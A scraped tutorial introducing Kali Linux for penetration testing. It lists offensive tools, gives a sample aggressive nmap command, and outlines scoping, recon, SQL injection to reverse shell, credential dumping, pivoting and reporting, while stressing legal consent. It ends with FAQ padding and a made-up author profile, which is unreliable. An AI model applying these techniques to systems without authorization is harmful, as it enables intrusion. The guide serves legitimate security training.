Kali Linux Penetration Testing Tutorial: Step-By-Step Process (2023)

Kali Linux turns 10 this year, and to celebrate, the Linux penetration testing distribution has added defensive security tools to its arsenal of open-source security tools.

It remains to be seen if Kali Purple will do for defensive open source security tools what Kali Linux has done for open source pentesting, but the addition of more than 100 open source tools for SIEM, incident response, intrusion detection and more should raise the profile of those defensive tools.

For now, Kali is primarily known for its roughly 600 open source pentesting tools, allowing pentesters to easily install a full range of offensive security tools.

In this article, we’ll focus primarily on how to use this powerful OS to run a pentest and mistakes to avoid. We’ll give you an overview of what can be achieved with Kali Linux using a short selection of pre-installed tools. While this guide serves as an introduction to common pentesting phases, with practical examples that highlight best practices, it’s not a substitution for a complete professional pentesting methodology.

Also read:

  • 24 Top Open Source Penetration Testing Tools
  • How to Implement a Penetration Testing Program in 10 Steps

Table of Contents

What is Kali Linux?

Kali Linux is a popular pentesting distribution maintained by Offensive Security (OffSec), a 15-year-old private security company. Kali contains scanners, sniffers, and many other attacking tools.

The OS can power a full pentest session or more specific attacks. While there are many other pentesting distributions, Kali is the top one recommended by professionals.

Indeed, most of its pre-installed packages are available as standalone packages, but Kali incorporates and maintains high-quality solutions that are meant for professional usage.

The idea behind the operating system is to have a comprehensive toolbox that is relatively easy to update while following the best standards in the industry.

Kali is built for pentesting only. That’s why you won’t want to install it as a primary OS unless your machine is dedicated to pentesting or it’s a virtual machine.

What’s new in Kali 2023.1?

Kali 2023.1 introduces a new kernel version and eight new packages, including CyberChef, which is a pretty convenient interface to decipher, decrypt, and decode various strings and hashes with granularity and accuracy.

New important Python changes (3.11.2) are expected in Debian’s upcoming Stable release, which raises some issues with PIP, the package manager for Python. The Kali team says it will impact all Debian-based distributions, including Kali, so they made a temporary patch to mitigate the problem.

The Kali team also warned that all Linux distributions could be affected by a bug with Nvidia drivers and some specific GPU models. Impacted devices might become slow or freeze. In such cases, there’s not much you can do except remove the Nvidia drivers and wait for a fix.

The other major addition in this release is the Purple Edition for defensive security, which we’ll cover further down.

It’s also worth mentioning changes in the Xfce desktop and the addition of the KDE plasma desktop. Kali users will also enjoy new wallpapers, boot and login screens.

You can inspect the full changelog to get all the details about this release.

Is Kali beginner-friendly?

Kali is available for anyone. It’s free and open-source, so anyone can download it. It’s a good idea to try things on your own and then read the documentation or tutorials.

(Video) Simple Penetration Testing Tutorial for Beginners!

However, is it a good place for beginners to start? While Kali IS beginner-friendly, professional pentesting is not something you can improvise. It requires knowledge and planning to be effective.

Here are some requirements for becoming a good pentester:

  • Mastery of pentesting basics: legal aspects, scopes, essential steps (such as passive recon, network discovery, enumeration, privilege escalation), post-exploitation, and persistence
  • Mastery of the network layers (the OSI model, IP, subnets, and more)
  • Mastery of Windows and Linux systems
  • Proficiency in Python and some programming languages (like Go, C, C++, Ruby); in my opinion, this isn’t optional, but some security specialists might say otherwise

Some people learn faster than others, but there’s a massive range of tools and concepts to know, so it will take time regardless of your learning skills or speed.

Getting Started: How to Install Kali Linux

Kali Linux is remarkably easy to install. The “Get Kali” page lists various installation modes, with pre-configured images and ready-to-use virtual machines.

Virtual machines are perfect for a quick intro. Feel free to test them, even if it’s just to see what the OS looks like.

Most operating systems are supported, and you’ll find Docker containers, and even support for Android and Raspberry Pi. Windows users can install Kali using the Windows Subsystem (WSL2), for example.

The bare metal installation is not recommended for beginners, though.

You can flash ISO images on an external drive to install Kali on the device of your choice by booting from that drive.

You can also run Kali in live mode with the live distributions without installing it on your device.

Mistakes to avoid with Kali Linux

Without proper knowledge, your pentest will likely fail, as there’s no magic recipe you can apply blindly regardless of how good your tools are.

Besides, attacking tools can send multiple probes or headers along with their requests (e.g., during scanning and discovery), which can be detected and blocked by security tools. Note that Kali won’t hide your IP or cover your fingerprints automagically. You may use a VPN or install utilities to capture and forward traffic to other subnets, or configure proxychains.

You may also leverage external platforms like Linode for your setup and operations.

However, if you are a complete newbie, my advice is to not rush on the tools, and to start with free open-source projects to attack, like the Juice Shop or many other vulnerable applications that are meant to help you learn cybersecurity.

Then you might want to learn more advanced techniques or to invest in dedicated online training programs (see the final section of this article).

Pentesting is not just about servers and web apps

A penetration test aims to emulate a real attack on a targeted system. It’s actually a broad term that covers a wide range of tests and procedures, not just for web apps, and organizations can leverage regular pentests to improve their security and fix critical vulnerabilities.

Unlike vulnerability assessments, pentests involve exploitation, which means you, as an attacker, will hack the system, for real, according to the rules defined before the test. The ultimate goal is to write a good report that provides recommendations.

Note that your pentest is not an exhaustive analysis, as you will likely have limited time and only need one working exploit to achieve your mission.

It’s important to bear in mind that pentesting is not limited to hacking vulnerable servers that host apps and databases. There are multiple other attack angles to test, including:

  • Network compromises
  • Social engineering (e.g., phishing)
  • Memory corruptions
  • Wi-Fi attacks

Kali is a wonderful toolbox, because it has tools for a wide range of pentests. Web apps are good for learning because many web servers are vulnerable and expose a large surface to attackers, as organizations have to expose their network to the public.

However, if it’s necessary (and in the contract), a pentester can perform physical attacks too.

(Video) Penetration testing with Kali Linux Complete Course

Don’t neglect the legal aspects

Laws are not the same everywhere, which means the same procedures can be legal in some countries and illegal in others. It’s especially true if you compare the EU to the U.S.

As far as I know, “Ethical hacking” is not a legally protected status. Legitimate security researchers have been sued after demonstrating critical vulnerabilities.

Scope is essential for distinguishing a pentest from a real attack. Of course, you need an explicit consent, which is usually a legal agreement, to run a pentest, but you must also define the scope very precisely before the operation.

Last but not least, installing Kali Linux at work without permission would raise liabilities too. The distribution contains sensitive programs that can expose your organization, not to mention jeopardize your employment.

Using Kali Linux: Finding Tools

There are literally hundreds of Kali Linux tools for various purposes. Beginners can start with very popular packages for classic and recurrent tasks, or they could ask security pros for their favorite tools.

While the list of tools can provide some hints, it can be confusing for beginners. Here’s a range of pentest tasks and the appropriate Kali Linux tools:

  • OSINT: Use Maltego to gather information, Dmitry for passive recon
  • Social Engineering: Use SET (the Social Engineer Toolkit)
  • Knowledge base: Use exploitdb
  • pentesting framework: Use the Metasploit Framework
  • Port scanning: Use Nmap to scan the targeted network and Ndiff to compare Nmap scans (e.g., to see which ports get closed/opened)
  • Wireless pentesting: Use Aircrack-ng to crack Wi-Fi, Bettercap for recon and MitM attacks on Wi-Fi and BLE (Bluetooth Low Energy) devices
  • Packet sniffing: Use Scapy to manipulate packets, Ettercap is also excellent to perform MitM attacks, and Wireshark is a must-have
  • Brute-Force URLs: Use Gobuster or DirBuster to scan URLs (directories, files, and DNS), and Nikto to detect server vulnerabilities
  • Web fuzzing: Use Wfuzz
  • Web hacking: Use BeEF to exploit XSS and other vulnerabilities with the browser or the Burp Suite to intercept requests
  • SQL injections: Use sqlmap to crack vulnerable databases
  • WordPress scanning: Use WPscan
  • Brute-Force logins remotely: Use Hydra (Hydra GTK for the graphical interface)
  • Brute-Force passwords: Use John The Ripper
  • Active Directory: Use Mimikatz, Impacket

The lists won’t tell you how to use each tool or the right combination to achieve your mission. Once installed, however, Kali Linux sorts packages by categories, which adds some helpful context and labels.

The category usually matches the typical phases of a pentest, like “information gathering” or “post-exploitation,” but also recurrent tasks, such as “password attacks.”

Just open the interactive menu:

Kali Linux Penetration Testing Tutorial: Step-By-Step Process (1)

Using a Pentesting Framework

The Metasploit Framework can support many steps of your work, from scanning and discovery to exploitation, and even post-exploitation.

On Kali, just open the interactive menu or type “msfconsole” in the terminal to start the console.

Kali Linux Penetration Testing Tutorial: Step-By-Step Process (2)

The console is verbose, so you’ll know quickly whether the exploit has succeeded. In my experience, the interface provides advanced payload capabilities and a standardized way to use very different hacking modules.

Note that you don’t have to use a framework, but you’ll have to combine several other pre-installed resources to achieve similar results. If you don’t like manual setups (e.g., for listeners) and other repetitive procedures, the console is a great option.

Of course, some cases may require other tools.

Also read: Getting Started With the Metasploit Framework: A Pentesting Tutorial

Step 1: Defining Scope and Goals

Clear goals and scope are critical for the success of your pentest. You and the organization will define the scope and the rules to apply during the test, which ensures there’s no misunderstanding and that there are clear goals.

Your customer will likely have to choose between three common approaches for the test:

  • Black box: You operate without any prior access or information about the target and usually focus on gaining initial access
  • Gray box: An intermediary approach where you could be given some credentials or internal information just to speed your progression and allow for deeper testing
  • White box: These tests are usually longer and focus on the later phases, like post-exploitation or persistence, to challenge the system and see how resilient it is against privilege escalations, insider jobs, or lateral movements

Not all organizations will need a white box test that requires significant time and budget, but it’s sometimes necessary.

You must discuss the timeline and other legal conditions during this step too. It’s critical for your customers to explain in detail what’s allowed and what’s not in a document that will be signed by you and them.

Wild attacks may appear more realistic for beginners, but in practice, it’s not uncommon to whitelist specific IPs that will be used by the pentesters. You need to define a methodology.

(Video) Linux for Ethical Hackers (Kali Linux Tutorial)

Step 2: Recon and OSINT

Reconnaissance, or “recon,” can be either passive or active.

For example, OSINT (Open-source Intelligence) is an indirect way to collect information, whereas Nmap involves active scanning, as you send probes to the targeted network.

Kali has powerful OSINT tools, like Maltego (the community edition is free to use). These programs can help you organize and automate your research.

In any case, you will generally need both passive and active recon during your pentest.

Kali Linux Penetration Testing Tutorial: Step-By-Step Process (3)

Step 3: Scan and Discover

Let’s say we have an IP/URL to scan. We can use classic Nmap commands to discover services and potential hosts to attack, for example:

nmap -oN nmapscan.txt -v -A {IP/URL}

The -v option is for “verbose” and -A means “aggressive scan,” which is slower and sends more probes to the target, but it’s not problematic here, as we are not in a real case. The -oN option is to export output to a text file with essential results.

If we discover that the server hosts a vulnerable database system, we will attack it.

Step 4: Gain Unauthorized Access and Exploit

SQL injections in a vulnerable database can lead to a Remote Code Execution (RCE).

If we manage to inject malicious SQL queries in the targeted database with sqlmap, we may exploit a typical vulnerability that allows writing files to pass arbitrary commands to the server.

Many exploits consist in uploading a reverse shell, which is basically a “connect-back” channel between your machine and the targeted server.

If such a shell can be opened as a privileged user (e.g., administrator), we’ll get the same privileges for our session!

The root account grants the highest privileges, allowing pretty much any operation while remaining undetected, which is perfect for post-exploitation.

Step 5: Post-exploitation

After exploiting a vulnerability and compromising a network, you may want to show what you can do with it to your customers to prove the impact and the risks associated with the breach.

Metasploit has tons of modules for this purpose, but you can open the interactive menu of Kali Linux to get the full list of post-exploitation tools available:

Kali Linux Penetration Testing Tutorial: Step-By-Step Process (4)

If it’s a Windows/Active directory environment, Kali has several packages for that, like Mimikatz, a small but powerful utility for Kerberoasting and password dumping, or Impacket, a set of scripts to attack.

Depending on the brief and the size of the organization, you may have to get further access, and progress from the system you’ve just compromised to another.

This technique is called pivoting. You may have to demonstrate that you can maintain access and get deeper into the targeted infrastructure.

Step 6: Clean Up Your Mess

The targeted network must be restored to its original state before you started your operation, which means removing all temporary accounts, scripts, and any other modifications you made on the system.

This phase is usually skipped during a CTF (Capture The Flag event) because the goal is to practice attacking techniques, but in real-world conditions, a pentester must cover all tracks.

Step 7: Report and Make Recommendations

During this step, you will write a report containing the vulnerabilities you’ve just exploited, the potential stolen data, and the recommendations to fix the situation, including technical advice.

(Video) Learning Network Penetration Testing with Kali Linux : Exploiting the Target System | packtpub.com

The report is the heart of a pentest and a critical document that literally determines the value of your work. It has to be meaningful and readable, so the organization can take concrete decisions to secure its network.

It may contain the following items:

  • Techniques used to gather intelligence
  • Techniques used to gain unauthorized access
  • The threat model and the level of risks
  • The estimated value of stolen data and credentials

You must prioritize the most relevant measures. Watch this tutorial by Hackersploit to learn more.

Open-source Alternatives to Kali Linux

There are some alternatives to Kali Linux worth considering.

Parrot OS Security Edition

Parrot OS Security should be very convenient for beginners, with lots of default configurations. Be careful when downloading the archive, though, as Parrot provides a “home edition” that is not meant for pentesting.

You’ll need the “security” edition. It’s still possible to install the home edition and the pentesting tools afterwards, but the security edition is more straightforward.

What I like about Parrot is the ease of use and the privacy-focused approach (no telemetry, anon surf, proxy).

The “Hack The Box Edition” is also worth mentioning. It aims to help beginners quickly set up a machine for a CTF (e.g., on the HTB platform), but you can use it to build a lab or a training environment for other objectives.

Black Arch Linux

You may have read that Arch is for “the real ones” (not beginners), as the installation is said to be more technical compared to many other Linux distros.

That’s not exactly true, as the latest versions are way easier to install compared to the oldest ones. You can now download a “slim” version too.

If you already use Arch, you can “upgrade” your installation to Black Arch with a dedicated installer in minutes.

Linux users may appreciate the core philosophy, which is very different from other distros like Ubuntu or Debian, and the ability to get the latest versions of security packages.

Kali Linux Penetration Testing Tutorial: Step-By-Step Process (5)

Kali Purple Edition

The Kali “Purple” edition was released recently and ships many popular packages for defensive security, including Yara and DefectDojo. There’s also a large range of forensic and reversing tools to discover.

The team added specific menus that follow the principles of the NIST Cybersecurity Framework: identify, protect, detect, respond, recover.

Users should be aware that this initiative is in its early stages, so you won’t get pre-configured VMs and the large support provided by the standard version.

Of course, you’re not supposed to migrate your current working environment to Purple right now. That would be a pretty crazy move, as this edition is not yet mature.

However, it’s stable enough to be tested, and defenders will certainly appreciate this new flavor despite the inevitable bugs and oversights.

It’s interesting to see OffSec exploring new fields. The Purple edition is aimed at Blue and Purple teams for defensive security, which means it’s a mix of both worlds, red and blue.

You can get more details about Kali Purple in the official wiki.

Kali Linux Penetration Testing Tutorial: Step-By-Step Process (6)

Resources for Kali Linux Training

Kali Linux requires effort and time. The key is to practice regularly and to learn from professionals in the field if you want to make it a career. An ethical hacking certification may help too.

(Video) Conduct a Penetration Test Like a Pro in 6 Phases [Tutorial]

The following links could help you unlock many skills:

Bottom Line: Kali Linux

Kali Linux deserves its great reputation as a critically important toolkit for pentesters and anyone hoping to become one. If your organization contains critically important data, whether web-facing or internal, pentesting is a cybersecurity best practice you should adopt to find vulnerabilities before the bad guys do. Kali Linux is a great place to start.

Further reading:

  • 10 Best Open-Source Vulnerability Scanners for 2023


Kali Linux Penetration Testing Tutorial: Step-By-Step Process? ›

The Five Phases of Penetration Testing. There are five penetration testing phases: reconnaissance, scanning, vulnerability assessment, exploitation, and reporting. Let's take a closer look at the 5 Penetration Testing phases.

What are the 7 stages of penetration testing? ›

The Seven Phases of a Penetration Test
  • Phase 1: Outline the scope and goals of testing. ...
  • Phase 2: The scoping call. ...
  • Phase 3: Prepare for test launch. ...
  • Phase 4: Testing. ...
  • Phase 5: Reporting. ...
  • Phase 6: Wrap-up. ...
  • Phase 7: Retesting and final reporting. ...
  • Conclusion: Pen testing phases summary.
Sep 9, 2022

What are the 5 steps of pentesting? ›

The Five Phases of Penetration Testing. There are five penetration testing phases: reconnaissance, scanning, vulnerability assessment, exploitation, and reporting. Let's take a closer look at the 5 Penetration Testing phases.

Can Kali Linux be used for penetration testing? ›

Kali Linux is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.

What is the correct order for penetration testing steps? ›

The penetration testing process typically goes through five phases: Planning and reconnaissance, scanning, gaining system access, persistent access, and the final analysis/report.


1. Penetration Testing - Kali Linux Setup
2. Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
(The Cyber Mentor)
3. Kali Linux Tutorial For Beginners!
(Loi Liang Yang)
4. My Top Penetration Testing Tools For Kali Linux In 2023
(InfoSec Pat)
5. Penetration Testing Steps in Kali Linux
(Information security - IV - IITM)
6. Full Ethical Hacking Course - Network Penetration Testing for Beginners (2019)
Top Articles
Latest Posts
Article information

Author: Annamae Dooley

Last Updated: 24/09/2023

Views: 5674

Rating: 4.4 / 5 (65 voted)

Reviews: 88% of readers found this page helpful

Author information

Name: Annamae Dooley

Birthday: 2001-07-26

Address: 9687 Tambra Meadow, Bradleyhaven, TN 53219

Phone: +9316045904039

Job: Future Coordinator

Hobby: Archery, Couponing, Poi, Kite flying, Knitting, Rappelling, Baseball

Introduction: My name is Annamae Dooley, I am a witty, quaint, lovely, clever, rich, sparkling, powerful person who loves writing and wants to share my knowledge and understanding with you.